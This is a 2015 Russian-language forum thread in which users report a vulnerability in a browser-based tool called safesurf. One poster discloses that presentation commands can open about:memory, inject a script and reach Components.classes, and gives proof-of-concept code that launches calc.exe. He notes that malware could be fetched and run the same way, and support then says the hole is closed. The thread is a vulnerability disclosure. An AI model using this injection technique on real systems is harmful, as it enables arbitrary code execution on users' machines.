Страница 1 из 1

уязвимость

Добавлено: 28 апр 2015, 14:23
bardak
Добрый день, обнаружил достаточно серьезную уязвимость на вашем сайте, с кем можно поговорить по этому вопросу? писал в скайп jetswaplive, в техподдержку не отвечают.

Re: уязвимость

Добавлено: 28 апр 2015, 18:38
loller5
Если через тикеты писали, то ответят до 48 часов.

Re: уязвимость

Добавлено: 29 апр 2015, 01:05
promot
Здравствуйте дорогие детки. Сейчас я расскажу сказку о том как запустить вирус на любой машинке, где установлен safesurf :roll:

Собственно уязвимость в том, что safesurf позволяет открыть через команды презентации внутренние страницы браузера, такие как about:memory и т.д., через которые можно получить доступ к Components.classes.

Презентация может быть такой

Код: Выделить всё

Переход  about:memory
Вставить скрипт <dls(path_to/inject.js)>
Ну, собственно, так можно запустить калькулятор (содержимое inject.js):

Код: Выделить всё

var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("C:\\Windows\\System32\\calc.exe");
file.launch();


Закачать и запустить какую-нибудь злобную программку, думаю, тоже труда не составит. Делайте выводы господа администраторы...

____________________________________________________

Проверим
loller5

____________________________________________________

Да уж, как я понимаю, работает только с данной странице, т.к. есть загрузка файла?
loller5
Добавлено в 29 апр 2015, 19:02

Ну я другие страницы не смотрел, может на каких-то еще возможно.

Re: уязвимость

Добавлено: 29 апр 2015, 19:19
Support
Спасибо, уязвимость закрыли.

Re: уязвимость

Добавлено: 30 апр 2015, 10:51
bardak
а то что я написал вообще никого не интересует... :(